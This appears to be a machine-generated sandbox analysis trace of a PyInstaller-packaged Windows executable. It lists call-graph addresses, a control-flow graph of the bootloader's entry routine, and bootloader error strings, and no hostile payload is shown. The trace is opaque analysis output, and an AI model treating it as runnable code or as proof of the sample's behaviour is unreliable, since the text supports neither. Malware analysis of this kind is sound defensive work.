53662->53620 53663->53625 53664->53619 53665->53624 53669 7ff76d5cf7ee 53668->53669 53670 7ff76d5cf7ae 53668->53670 53669->53670 53671 7ff76d5cf7fa 53669->53671 53680 7ff76d5d9b24 37 API calls 2 library calls 53670->53680 53679 7ff76d5d477c EnterCriticalSection 53671->53679 53674 7ff76d5cf7d5 53674->53465 53675 7ff76d5cf7ff 53676 7ff76d5cf908 71 API calls 53675->53676 53677 7ff76d5cf811 53676->53677 53678 7ff76d5d4788 _fread_nolock LeaveCriticalSection 53677->53678 53678->53674 53680->53674 53682 7ff76d5cfe2c 53681->53682 53689 7ff76d5cfb4c 53682->53689 53684 7ff76d5cfe4a 53684->53482 53685->53471 53686->53478 53687->53478 53688->53478 53690 7ff76d5cfb99 53689->53690 53691 7ff76d5cfb6c 53689->53691 53690->53684 53691->53690 53692 7ff76d5cfb76 53691->53692 53693 7ff76d5cfba1 53691->53693 53703 7ff76d5d9b24 37 API calls 2 library calls 53692->53703 53696 7ff76d5cfa8c 53693->53696 53704 7ff76d5d477c EnterCriticalSection 53696->53704 53698 7ff76d5cfaa9 53699 7ff76d5cfacc 74 API calls 53698->53699 53700 7ff76d5cfab2 53699->53700 53701 7ff76d5d4788 _fread_nolock LeaveCriticalSection 53700->53701 53702 7ff76d5cfabd 53701->53702 53702->53690 53703->53690 53706 7ff76d5cf163 53705->53706 53707 7ff76d5cf191 53705->53707 53716 7ff76d5d9b24 37 API calls 2 library calls 53706->53716 53714 7ff76d5cf183 53707->53714 53715 7ff76d5d477c EnterCriticalSection 53707->53715 53710 7ff76d5cf1a8 53711 7ff76d5cf1c4 72 API calls 53710->53711 53712 7ff76d5cf1b4 53711->53712 53713 7ff76d5d4788 _fread_nolock LeaveCriticalSection 53712->53713 53713->53714 53714->53487 53716->53714 53718 7ff76d5cf6d4 53717->53718 53719 7ff76d5cf706 53717->53719 53718->53427 53719->53718 53720 7ff76d5cf715 __scrt_get_show_window_mode 53719->53720 53721 7ff76d5cf752 53719->53721 53731 7ff76d5d43f4 11 API calls _set_fmode 53720->53731 53730 7ff76d5d477c EnterCriticalSection 53721->53730 53723 7ff76d5cf75a 53725 7ff76d5cf45c _fread_nolock 51 API calls 53723->53725 53727 7ff76d5cf771 53725->53727 53726 7ff76d5cf72a 53732 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 53726->53732 53729 7ff76d5d4788 _fread_nolock LeaveCriticalSection 53727->53729 53729->53718 53731->53726 53732->53718 53737 7ff76d5d3cfe 53733->53737 53734 7ff76d5d3d23 53751 7ff76d5d9b24 37 API calls 2 library calls 53734->53751 53736 7ff76d5d3d5f 53752 7ff76d5d1f30 49 API calls _invalid_parameter_noinfo 53736->53752 53737->53734 53737->53736 53739 7ff76d5d3d4d 53741 7ff76d5cb870 _log10_special 8 API calls 53739->53741 53740 7ff76d5d3df6 53743 7ff76d5d3e3c 53740->53743 53744 7ff76d5d3e08 53740->53744 53746 7ff76d5d3e60 53740->53746 53747 7ff76d5d3e11 53740->53747 53745 7ff76d5c1c38 53741->53745 53742 7ff76d5d9c58 __free_lconv_mon 11 API calls 53742->53739 53743->53742 53744->53743 53744->53747 53745->53393 53746->53743 53748 7ff76d5d3e6a 53746->53748 53753 7ff76d5d9c58 53747->53753 53750 7ff76d5d9c58 __free_lconv_mon 11 API calls 53748->53750 53750->53739 53751->53739 53752->53740 53754 7ff76d5d9c5d HeapFree 53753->53754 53758 7ff76d5d9c8c 53753->53758 53755 7ff76d5d9c78 GetLastError 53754->53755 53754->53758 53756 7ff76d5d9c85 __free_lconv_mon 53755->53756 53759 7ff76d5d43f4 11 API calls _set_fmode 53756->53759 53758->53739 53759->53758 53760->53442 53762 7ffdf7183ec0 53763 7ffdf7183eca 53762->53763 53764 7ffdf7183f34 00007FFE1FFB08A0 53763->53764 53765 7ffdf7183edd 53763->53765 53766 7ffdf7183f65 53764->53766 53767 7ff76d5cbf5c 53788 7ff76d5cc12c 53767->53788 53770 7ff76d5cc0a8 53907 7ff76d5cc44c 7 API calls 2 library calls 53770->53907 53771 7ff76d5cbf78 __scrt_acquire_startup_lock 53773 7ff76d5cc0b2 53771->53773 53779 7ff76d5cbf96 __scrt_release_startup_lock 53771->53779 53908 7ff76d5cc44c 7 API calls 2 library calls 53773->53908 53775 7ff76d5cbfbb 53776 7ff76d5cc0bd __CxxCallCatchBlock 53777 7ff76d5cc041 53794 7ff76d5cc594 53777->53794 53779->53775 53779->53777 53904 7ff76d5d8e44 45 API calls 53779->53904 53781 7ff76d5cc046 53797 7ff76d5c1000 53781->53797 53785 7ff76d5cc069 53785->53776 53906 7ff76d5cc2b0 7 API calls 53785->53906 53787 7ff76d5cc080 53787->53775 53789 7ff76d5cc134 53788->53789 53790 7ff76d5cc140 __scrt_dllmain_crt_thread_attach 53789->53790 53791 7ff76d5cbf70 53790->53791 53792 7ff76d5cc14d 53790->53792 53791->53770 53791->53771 53792->53791 53909 7ff76d5ccba8 7 API calls 2 library calls 53792->53909 53910 7ff76d5e97e0 53794->53910 53798 7ff76d5c1009 53797->53798 53912 7ff76d5d4794 53798->53912 53800 7ff76d5c352b 53919 7ff76d5c33e0 53800->53919 53803 7ff76d5c3538 53805 7ff76d5cb870 _log10_special 8 API calls 53803->53805 53807 7ff76d5c372a 53805->53807 53905 7ff76d5cc5d8 GetModuleHandleW 53807->53905 53808 7ff76d5c3736 53810 7ff76d5c3f70 108 API calls 53808->53810 53809 7ff76d5c356c 53811 7ff76d5c1bf0 49 API calls 53809->53811 53812 7ff76d5c3746 53810->53812 53819 7ff76d5c3588 53811->53819 53813 7ff76d5c3785 53812->53813 54005 7ff76d5c76a0 53812->54005 54014 7ff76d5c25f0 53 API calls _log10_special 53813->54014 53817 7ff76d5c3778 53820 7ff76d5c379f 53817->53820 53821 7ff76d5c377d 53817->53821 53818 7ff76d5c365f __std_exception_copy 53823 7ff76d5c3844 53818->53823 53826 7ff76d5c7e10 14 API calls 53818->53826 53981 7ff76d5c7e10 53819->53981 53822 7ff76d5c1bf0 49 API calls 53820->53822 53824 7ff76d5cf36c 74 API calls 53821->53824 53825 7ff76d5c37be 53822->53825 54018 7ff76d5c3e90 49 API calls 53823->54018 53824->53813 53833 7ff76d5c18f0 115 API calls 53825->53833 53828 7ff76d5c36ae 53826->53828 54003 7ff76d5c7f80 40 API calls __std_exception_copy 53828->54003 53829 7ff76d5c3852 53831 7ff76d5c3871 53829->53831 53832 7ff76d5c3865 53829->53832 53835 7ff76d5c1bf0 49 API calls 53831->53835 54019 7ff76d5c3fe0 53832->54019 53836 7ff76d5c37df 53833->53836 53852 7ff76d5c3805 __std_exception_copy 53835->53852 53836->53819 53840 7ff76d5c37ef 53836->53840 53837 7ff76d5c380f 54016 7ff76d5c8400 58 API calls _log10_special 53837->54016 53838 7ff76d5c36bd 53838->53837 53841 7ff76d5c36cf 53838->53841 53839 7ff76d5c86b0 2 API calls 53843 7ff76d5c389e SetDllDirectoryW 53839->53843 54015 7ff76d5c25f0 53 API calls _log10_special 53840->54015 53845 7ff76d5c1bf0 49 API calls 53841->53845 53851 7ff76d5c38c3 53843->53851 53849 7ff76d5c36f1 53845->53849 53846 7ff76d5c3814 54017 7ff76d5c7c40 84 API calls 2 library calls 53846->54017 53849->53852 53853 7ff76d5c36fc 53849->53853 53855 7ff76d5c3a50 53851->53855 54022 7ff76d5c6560 53 API calls 53851->54022 53852->53839 54004 7ff76d5c25f0 53 API calls _log10_special 53853->54004 53854 7ff76d5c3834 53854->53823 53854->53852 53858 7ff76d5c3a5a PostMessageW GetMessageW 53855->53858 53859 7ff76d5c3a7d 53855->53859 53858->53859 53994 7ff76d5c3080 53859->53994 53860 7ff76d5c38d5 54023 7ff76d5c6b00 118 API calls 2 library calls 53860->54023 53862 7ff76d5c38ea 53864 7ff76d5c3947 53862->53864 53866 7ff76d5c3901 53862->53866 54024 7ff76d5c65a0 121 API calls _log10_special 53862->54024 53864->53855 53872 7ff76d5c395c 53864->53872 53879 7ff76d5c3905 53866->53879 54025 7ff76d5c6970 91 API calls 53866->54025 53870 7ff76d5c3916 53870->53879 54026 7ff76d5c6cd0 54 API calls 53870->54026 53871 7ff76d5c3a97 54032 7ff76d5c6780 FreeLibrary 53871->54032 54029 7ff76d5c30e0 122 API calls 2 library calls 53872->54029 53875 7ff76d5c3964 53875->53803 53878 7ff76d5c396c 53875->53878 53877 7ff76d5c3aa3 54030 7ff76d5c83e0 LocalFree 53878->54030 53879->53864 54027 7ff76d5c2870 53 API calls _log10_special 53879->54027 53882 7ff76d5c393f 54028 7ff76d5c6780 FreeLibrary 53882->54028 53904->53777 53905->53785 53906->53787 53907->53773 53908->53776 53909->53791 53911 7ff76d5cc5ab GetStartupInfoW 53910->53911 53911->53781 53915 7ff76d5de790 53912->53915 53913 7ff76d5de7e3 54033 7ff76d5d9b24 37 API calls 2 library calls 53913->54033 53915->53913 53916 7ff76d5de836 53915->53916 54034 7ff76d5de668 71 API calls _fread_nolock 53916->54034 53918 7ff76d5de80c 53918->53800 54035 7ff76d5cbb70 53919->54035 53922 7ff76d5c3438 54037 7ff76d5c85a0 FindFirstFileExW 53922->54037 53923 7ff76d5c341b 54042 7ff76d5c29e0 51 API calls _log10_special 53923->54042 53927 7ff76d5c342e 53931 7ff76d5cb870 _log10_special 8 API calls 53927->53931 53928 7ff76d5c34a5 54045 7ff76d5c8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 53928->54045 53929 7ff76d5c344b 54043 7ff76d5c8620 CreateFileW GetFinalPathNameByHandleW CloseHandle 53929->54043 53934 7ff76d5c34dd 53931->53934 53933 7ff76d5c3458 53936 7ff76d5c3474 __vcrt_FlsAlloc 53933->53936 53937 7ff76d5c345c 53933->53937 53934->53803 53941 7ff76d5c18f0 53934->53941 53935 7ff76d5c34b3 53935->53927 54046 7ff76d5c26c0 49 API calls _log10_special 53935->54046 53936->53928 54044 7ff76d5c26c0 49 API calls _log10_special 53937->54044 53940 7ff76d5c346d 53940->53927 53942 7ff76d5c3f70 108 API calls 53941->53942 53943 7ff76d5c1925 53942->53943 53944 7ff76d5c1bb6 53943->53944 53946 7ff76d5c76a0 83 API calls 53943->53946 53945 7ff76d5cb870 _log10_special 8 API calls 53944->53945 53947 7ff76d5c1bd1 53945->53947 53948 7ff76d5c196b 53946->53948 53947->53808 53947->53809 53950 7ff76d5cf9f4 73 API calls 53948->53950 53980 7ff76d5c199c 53948->53980 53949 7ff76d5cf36c 74 API calls 53949->53944 53951 7ff76d5c1985 53950->53951 53952 7ff76d5c19a1 53951->53952 53953 7ff76d5c1989 53951->53953 53955 7ff76d5cf6bc _fread_nolock 53 API calls 53952->53955 54047 7ff76d5c2760 53 API calls 2 library calls 53953->54047 53956 7ff76d5c19b9 53955->53956 53957 7ff76d5c19bf 53956->53957 53958 7ff76d5c19d7 53956->53958 54048 7ff76d5c2760 53 API calls 2 library calls 53957->54048 53960 7ff76d5c1a06 53958->53960 53961 7ff76d5c19ee 53958->53961 53962 7ff76d5c1bf0 49 API calls 53960->53962 54049 7ff76d5c2760 53 API calls 2 library calls 53961->54049 53964 7ff76d5c1a1d 53962->53964 53965 7ff76d5c1bf0 49 API calls 53964->53965 53966 7ff76d5c1a68 53965->53966 53967 7ff76d5cf9f4 73 API calls 53966->53967 53968 7ff76d5c1a8c 53967->53968 53969 7ff76d5c1aa1 53968->53969 53970 7ff76d5c1ab9 53968->53970 54050 7ff76d5c2760 53 API calls 2 library calls 53969->54050 53972 7ff76d5cf6bc _fread_nolock 53 API calls 53970->53972 53973 7ff76d5c1ace 53972->53973 53974 7ff76d5c1ad4 53973->53974 53975 7ff76d5c1aec 53973->53975 54051 7ff76d5c2760 53 API calls 2 library calls 53974->54051 54052 7ff76d5cf430 37 API calls 2 library calls 53975->54052 53978 7ff76d5c1b06 53978->53980 54053 7ff76d5c25f0 53 API calls _log10_special 53978->54053 53980->53949 53982 7ff76d5c7e1a 53981->53982 53983 7ff76d5c86b0 2 API calls 53982->53983 53984 7ff76d5c7e39 GetEnvironmentVariableW 53983->53984 53985 7ff76d5c7ea2 53984->53985 53986 7ff76d5c7e56 ExpandEnvironmentStringsW 53984->53986 53988 7ff76d5cb870 _log10_special 8 API calls 53985->53988 53986->53985 53987 7ff76d5c7e78 53986->53987 54054 7ff76d5c8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 53987->54054 53990 7ff76d5c7eb4 53988->53990 53990->53818 53991 7ff76d5c7e8a 53992 7ff76d5cb870 _log10_special 8 API calls 53991->53992 53993 7ff76d5c7e9a 53992->53993 53993->53818 54055 7ff76d5c5af0 53994->54055 53998 7ff76d5c30a1 54002 7ff76d5c30b9 53998->54002 54125 7ff76d5c5800 53998->54125 54000 7ff76d5c30ad 54000->54002 54134 7ff76d5c5990 53 API calls 54000->54134 54031 7ff76d5c33a0 FreeLibrary 54002->54031 54003->53838 54004->53803 54006 7ff76d5c76c4 54005->54006 54007 7ff76d5cf9f4 73 API calls 54006->54007 54012 7ff76d5c779b __std_exception_copy 54006->54012 54008 7ff76d5c76e0 54007->54008 54008->54012 54197 7ff76d5d6bd8 54008->54197 54010 7ff76d5cf9f4 73 API calls 54013 7ff76d5c76f5 54010->54013 54011 7ff76d5cf6bc _fread_nolock 53 API calls 54011->54013 54012->53817 54013->54010 54013->54011 54013->54012 54014->53803 54015->53803 54016->53846 54017->53854 54018->53829 54020 7ff76d5c1bf0 49 API calls 54019->54020 54021 7ff76d5c4010 54020->54021 54021->53852 54022->53860 54023->53862 54024->53866 54025->53870 54026->53879 54027->53882 54028->53864 54029->53875 54031->53871 54032->53877 54033->53918 54034->53918 54036 7ff76d5c33ec GetModuleFileNameW 54035->54036 54036->53922 54036->53923 54038 7ff76d5c85df FindClose 54037->54038 54039 7ff76d5c85f2 54037->54039 54038->54039 54040 7ff76d5cb870 _log10_special 8 API calls 54039->54040 54041 7ff76d5c3442 54040->54041 54041->53928 54041->53929 54042->53927 54043->53933 54044->53940 54045->53935 54046->53927 54047->53980 54048->53980 54049->53980 54050->53980 54051->53980 54052->53978 54053->53980 54054->53991 54056 7ff76d5c5b05 54055->54056 54057 7ff76d5c1bf0 49 API calls 54056->54057 54058 7ff76d5c5b41 54057->54058 54059 7ff76d5c5b4a 54058->54059 54060 7ff76d5c5b6d 54058->54060 54145 7ff76d5c25f0 53 API calls _log10_special 54059->54145 54062 7ff76d5c3fe0 49 API calls 54060->54062 54063 7ff76d5c5b85 54062->54063 54064 7ff76d5c5ba3 54063->54064 54146 7ff76d5c25f0 53 API calls _log10_special 54063->54146 54135 7ff76d5c3f10 54064->54135 54065 7ff76d5cb870 _log10_special 8 API calls 54068 7ff76d5c308e 54065->54068 54068->54002 54086 7ff76d5c5c80 54068->54086 54070 7ff76d5c5bbb 54072 7ff76d5c3fe0 49 API calls 54070->54072 54071 7ff76d5c81a0 3 API calls 54071->54070 54073 7ff76d5c5bd4 54072->54073 54074 7ff76d5c5bf9 54073->54074 54075 7ff76d5c5bd9 54073->54075 54141 7ff76d5c81a0 54074->54141 54147 7ff76d5c25f0 53 API calls _log10_special 54075->54147 54078 7ff76d5c5b63 54078->54065 54079 7ff76d5c5c06 54080 7ff76d5c5c12 54079->54080 54081 7ff76d5c5c49 54079->54081 54083 7ff76d5c86b0 2 API calls 54080->54083 54149 7ff76d5c50b0 95 API calls 54081->54149 54084 7ff76d5c5c2a 54083->54084 54148 7ff76d5c29e0 51 API calls _log10_special 54084->54148 54150 7ff76d5c4c80 54086->54150 54088 7ff76d5c5cba 54089 7ff76d5c5cc2 54088->54089 54090 7ff76d5c5cd3 54088->54090 54182 7ff76d5c25f0 53 API calls _log10_special 54089->54182 54157 7ff76d5c4450 54090->54157 54094 7ff76d5c5cf0 54098 7ff76d5c5d10 54094->54098 54099 7ff76d5c5cff 54094->54099 54095 7ff76d5c5cdf 54183 7ff76d5c25f0 53 API calls _log10_special 54095->54183 54097 7ff76d5c5cce 54097->53998 54161 7ff76d5c4700 54098->54161 54184 7ff76d5c25f0 53 API calls _log10_special 54099->54184 54102 7ff76d5c5d2b 54103 7ff76d5c5d40 54102->54103 54104 7ff76d5c5d2f 54102->54104 54106 7ff76d5c5d60 54103->54106 54107 7ff76d5c5d4f 54103->54107 54185 7ff76d5c25f0 53 API calls _log10_special 54104->54185 54168 7ff76d5c45a0 54106->54168 54186 7ff76d5c25f0 53 API calls _log10_special 54107->54186 54111 7ff76d5c5d80 54114 7ff76d5c5da0 54111->54114 54115 7ff76d5c5d8f 54111->54115 54112 7ff76d5c5d6f 54187 7ff76d5c25f0 53 API calls _log10_special 54112->54187 54117 7ff76d5c5db1 54114->54117 54119 7ff76d5c5dc2 54114->54119 54188 7ff76d5c25f0 53 API calls _log10_special 54115->54188 54189 7ff76d5c25f0 53 API calls _log10_special 54117->54189 54122 7ff76d5c5dec 54119->54122 54190 7ff76d5d65c0 73 API calls 54119->54190 54121 7ff76d5c5dda 54191 7ff76d5d65c0 73 API calls 54121->54191 54122->54097 54192 7ff76d5c25f0 53 API calls _log10_special 54122->54192 54126 7ff76d5c5820 54125->54126 54126->54126 54127 7ff76d5c5849 54126->54127 54131 7ff76d5c5860 __std_exception_copy 54126->54131 54196 7ff76d5c25f0 53 API calls _log10_special 54127->54196 54129 7ff76d5c5855 54129->54000 54130 7ff76d5c1440 116 API calls 54130->54131 54131->54130 54132 7ff76d5c25f0 53 API calls 54131->54132 54133 7ff76d5c596b 54131->54133 54132->54131 54133->54000 54134->54002 54136 7ff76d5c3f1a 54135->54136 54137 7ff76d5c86b0 2 API calls 54136->54137 54138 7ff76d5c3f3f 54137->54138 54139 7ff76d5cb870 _log10_special 8 API calls 54138->54139 54140 7ff76d5c3f67 54139->54140 54140->54070 54140->54071 54142 7ff76d5c86b0 2 API calls 54141->54142 54143 7ff76d5c81b4 LoadLibraryExW 54142->54143 54144 7ff76d5c81d3 __std_exception_copy 54143->54144 54144->54079 54145->54078 54146->54064 54147->54078 54148->54078 54149->54078 54152 7ff76d5c4cac 54150->54152 54151 7ff76d5c4cb4 54151->54088 54152->54151 54155 7ff76d5c4e54 54152->54155 54193 7ff76d5d5db4 48 API calls 54152->54193 54153 7ff76d5c5017 __std_exception_copy 54153->54088 54154 7ff76d5c4180 47 API calls 54154->54155 54155->54153 54155->54154 54158 7ff76d5c4480 54157->54158 54159 7ff76d5cb870 _log10_special 8 API calls 54158->54159 54160 7ff76d5c44ea 54159->54160 54160->54094 54160->54095 54162 7ff76d5c476f 54161->54162 54165 7ff76d5c471b 54161->54165 54195 7ff76d5c4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 54162->54195 54164 7ff76d5c477c 54164->54102 54167 7ff76d5c475a 54165->54167 54194 7ff76d5c4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 54165->54194 54167->54102 54169 7ff76d5c45b5 54168->54169 54170 7ff76d5c1bf0 49 API calls 54169->54170 54171 7ff76d5c4601 54170->54171 54172 7ff76d5c4687 __std_exception_copy 54171->54172 54173 7ff76d5c1bf0 49 API calls 54171->54173 54174 7ff76d5cb870 _log10_special 8 API calls 54172->54174 54175 7ff76d5c4640 54173->54175 54176 7ff76d5c46dc 54174->54176 54175->54172 54177 7ff76d5c86b0 2 API calls 54175->54177 54176->54111 54176->54112 54178 7ff76d5c465a 54177->54178 54179 7ff76d5c86b0 2 API calls 54178->54179 54180 7ff76d5c4671 54179->54180 54181 7ff76d5c86b0 2 API calls 54180->54181 54181->54172 54182->54097 54183->54097 54184->54097 54185->54097 54186->54097 54187->54097 54188->54097 54189->54097 54190->54121 54191->54122 54192->54097 54193->54152 54194->54167 54195->54164 54196->54129 54198 7ff76d5d6c08 54197->54198 54201 7ff76d5d66e4 54198->54201 54200 7ff76d5d6c21 54200->54013 54202 7ff76d5d66ff 54201->54202 54203 7ff76d5d672e 54201->54203 54212 7ff76d5d9b24 37 API calls 2 library calls 54202->54212 54211 7ff76d5d477c EnterCriticalSection 54203->54211 54206 7ff76d5d6733 54207 7ff76d5d6750 38 API calls 54206->54207 54208 7ff76d5d673f 54207->54208 54209 7ff76d5d4788 _fread_nolock LeaveCriticalSection 54208->54209 54210 7ff76d5d671f 54209->54210 54210->54200 54212->54210 54260 7ffdfb8998a0 54261 7ffdfb8998b8 54260->54261 54266 7ffdfb89a496 54260->54266 54262 7ffdfb89a3fe 00007FFE2167BC70 00007FFE2167BC70 54261->54262 54263 7ffdfb89a3a3 00007FFE216804F0 54261->54263 54265 7ffdfb89a3dc 00007FFE2167AEC0 54261->54265 54262->54266 54263->54261 54265->54261 54267 7ffdfb89a3f3 54265->54267 54268 7ffdf7196610 54270 7ffdf71965cb 54268->54270 54270->54268 54271 7ffdf71967bf 54270->54271 54272 7ffdf715119f 00007FFE13301210 54270->54272 54272->54270 54213 7ff76d5d4938 54214 7ff76d5d496f 54213->54214 54215 7ff76d5d4952 54213->54215 54214->54215 54217 7ff76d5d4982 CreateFileW 54214->54217 54238 7ff76d5d43d4 11 API calls _set_fmode 54215->54238 54219 7ff76d5d49b6 54217->54219 54220 7ff76d5d49ec 54217->54220 54218 7ff76d5d4957 54239 7ff76d5d43f4 11 API calls _set_fmode 54218->54239 54241 7ff76d5d4a8c 59 API calls 3 library calls 54219->54241 54242 7ff76d5d4f14 46 API calls 3 library calls 54220->54242 54224 7ff76d5d49f1 54227 7ff76d5d49f5 54224->54227 54228 7ff76d5d4a20 54224->54228 54225 7ff76d5d495f 54240 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 54225->54240 54226 7ff76d5d49c4 54230 7ff76d5d49e1 CloseHandle 54226->54230 54231 7ff76d5d49cb CloseHandle 54226->54231 54243 7ff76d5d4368 11 API calls 2 library calls 54227->54243 54244 7ff76d5d4cd4 51 API calls 54228->54244 54232 7ff76d5d496a 54230->54232 54231->54232 54235 7ff76d5d4a2d 54245 7ff76d5d4e10 21 API calls _fread_nolock 54235->54245 54237 7ff76d5d49ff 54237->54232 54238->54218 54239->54225 54240->54232 54241->54226 54242->54224 54243->54237 54244->54235 54245->54237 54246 7ffe10248958 54248 7ffe10248960 54246->54248 54249 7ffe102489a5 54248->54249 54250 7ffe102446a0 00007FFE20492730 54248->54250 54250->54248 54251 7ffe102490b8 54253 7ffe102490ed 54251->54253 54252 7ffe102490fd 54253->54252 54255 7ffe102491a4 54253->54255 54257 7ffe102491dd 54255->54257 54258 7ffe102491f9 54257->54258 54259 7ffe102446a0 00007FFE20492730 54257->54259 54258->54252 54259->54257

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ff76d5c1000-7ff76d5c3536 call 7ff76d5cf138 call 7ff76d5cf140 call 7ff76d5cbb70 call 7ff76d5d4700 call 7ff76d5d4794 call 7ff76d5c33e0 14 7ff76d5c3544-7ff76d5c3566 call 7ff76d5c18f0 0->14 15 7ff76d5c3538-7ff76d5c353f 0->15 21 7ff76d5c3736-7ff76d5c374c call 7ff76d5c3f70 14->21 22 7ff76d5c356c-7ff76d5c3583 call 7ff76d5c1bf0 14->22 16 7ff76d5c371a-7ff76d5c3735 call 7ff76d5cb870 15->16 27 7ff76d5c3785-7ff76d5c379a call 7ff76d5c25f0 21->27 28 7ff76d5c374e-7ff76d5c377b call 7ff76d5c76a0 21->28 26 7ff76d5c3588-7ff76d5c35c1 22->26 29 7ff76d5c3653-7ff76d5c366d call 7ff76d5c7e10 26->29 30 7ff76d5c35c7-7ff76d5c35cb 26->30 41 7ff76d5c3712 27->41 45 7ff76d5c379f-7ff76d5c37be call 7ff76d5c1bf0 28->45 46 7ff76d5c377d-7ff76d5c3780 call 7ff76d5cf36c 28->46 42 7ff76d5c366f-7ff76d5c3675 29->42 43 7ff76d5c3695-7ff76d5c369c 29->43 34 7ff76d5c3638-7ff76d5c364d call 7ff76d5c18e0 30->34 35 7ff76d5c35cd-7ff76d5c35e5 call 7ff76d5d4560 30->35 34->29 34->30 50 7ff76d5c35f2-7ff76d5c360a call 7ff76d5d4560 35->50 51 7ff76d5c35e7-7ff76d5c35eb 35->51 41->16 48 7ff76d5c3682-7ff76d5c3690 call 7ff76d5d415c 42->48 49 7ff76d5c3677-7ff76d5c3680 42->49 53 7ff76d5c36a2-7ff76d5c36c0 call 7ff76d5c7e10 call 7ff76d5c7f80 43->53 54 7ff76d5c3844-7ff76d5c3863 call 7ff76d5c3e90 43->54 61 7ff76d5c37c1-7ff76d5c37ca 45->61 46->27 48->43 49->48 66 7ff76d5c3617-7ff76d5c362f call 7ff76d5d4560 50->66 67 7ff76d5c360c-7ff76d5c3610 50->67 51->50 78 7ff76d5c380f-7ff76d5c381e call 7ff76d5c8400 53->78 79 7ff76d5c36c6-7ff76d5c36c9 53->79 69 7ff76d5c3871-7ff76d5c3882 call 7ff76d5c1bf0 54->69 70 7ff76d5c3865-7ff76d5c386f call 7ff76d5c3fe0 54->70 61->61 65 7ff76d5c37cc-7ff76d5c37e9 call 7ff76d5c18f0 61->65 65->26 83 7ff76d5c37ef-7ff76d5c3800 call 7ff76d5c25f0 65->83 66->34 84 7ff76d5c3631 66->84 67->66 81 7ff76d5c3887-7ff76d5c38a1 call 7ff76d5c86b0 69->81 70->81 91 7ff76d5c3820 78->91 92 7ff76d5c382c-7ff76d5c3836 call 7ff76d5c7c40 78->92 79->78 85 7ff76d5c36cf-7ff76d5c36f6 call 7ff76d5c1bf0 79->85 93 7ff76d5c38af-7ff76d5c38c1 SetDllDirectoryW 81->93 94 7ff76d5c38a3 81->94 83->41 84->34 100 7ff76d5c3805-7ff76d5c380d call 7ff76d5d415c 85->100 101 7ff76d5c36fc-7ff76d5c3703 call 7ff76d5c25f0 85->101 91->92 92->81 110 7ff76d5c3838 92->110 98 7ff76d5c38d0-7ff76d5c38ec call 7ff76d5c6560 call 7ff76d5c6b00 93->98 99 7ff76d5c38c3-7ff76d5c38ca 93->99 94->93 118 7ff76d5c3947-7ff76d5c394a call 7ff76d5c6510 98->118 119 7ff76d5c38ee-7ff76d5c38f4 98->119 99->98 103 7ff76d5c3a50-7ff76d5c3a58 99->103 100->81 107 7ff76d5c3708-7ff76d5c370a 101->107 108 7ff76d5c3a5a-7ff76d5c3a77 PostMessageW GetMessageW 103->108 109 7ff76d5c3a7d-7ff76d5c3a88 call 7ff76d5c33d0 call 7ff76d5c3080 103->109 107->41 108->109 120 7ff76d5c3a8d-7ff76d5c3aaf call 7ff76d5c33a0 call 7ff76d5c6780 call 7ff76d5c6510 109->120 110->54 127 7ff76d5c394f-7ff76d5c3956 118->127 121 7ff76d5c38f6-7ff76d5c3903 call 7ff76d5c65a0 119->121 122 7ff76d5c390e-7ff76d5c3918 call 7ff76d5c6970 119->122 121->122 136 7ff76d5c3905-7ff76d5c390c 121->136 133 7ff76d5c3923-7ff76d5c3931 call 7ff76d5c6cd0 122->133 134 7ff76d5c391a-7ff76d5c3921 122->134 127->103 131 7ff76d5c395c-7ff76d5c3966 call 7ff76d5c30e0 127->131 131->107 141 7ff76d5c396c-7ff76d5c3980 call 7ff76d5c83e0 131->141 133->127 146 7ff76d5c3933 133->146 137 7ff76d5c393a-7ff76d5c3942 call 7ff76d5c2870 call 7ff76d5c6780 134->137 136->137 137->118 151 7ff76d5c3982-7ff76d5c399f PostMessageW GetMessageW 141->151 152 7ff76d5c39a5-7ff76d5c39e8 call 7ff76d5c7f20 call 7ff76d5c7fc0 call 7ff76d5c6780 call 7ff76d5c6510 call 7ff76d5c7ec0 141->152 146->137 151->152 163 7ff76d5c39ea-7ff76d5c3a00 call 7ff76d5c81f0 call 7ff76d5c7ec0 152->163 164 7ff76d5c3a3d-7ff76d5c3a4b call 7ff76d5c18a0 152->164 163->164 171 7ff76d5c3a02-7ff76d5c3a10 163->171 164->107 172 7ff76d5c3a12-7ff76d5c3a2c call 7ff76d5c25f0 call 7ff76d5c18a0 171->172 173 7ff76d5c3a31-7ff76d5c3a38 call 7ff76d5c2870 171->173 172->107 173->164
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$[oV116$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
                                                                      • API String ID: 514040917-3585573875
                                                                      • Opcode ID: 4cb2c86178b2debc9d1438e34e60b398346cd33ecfd6192601395768889eb40b
